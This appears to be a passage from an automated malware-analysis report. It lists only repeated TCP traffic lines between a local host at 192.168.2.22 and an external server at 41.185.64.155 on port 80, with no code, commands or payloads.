          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
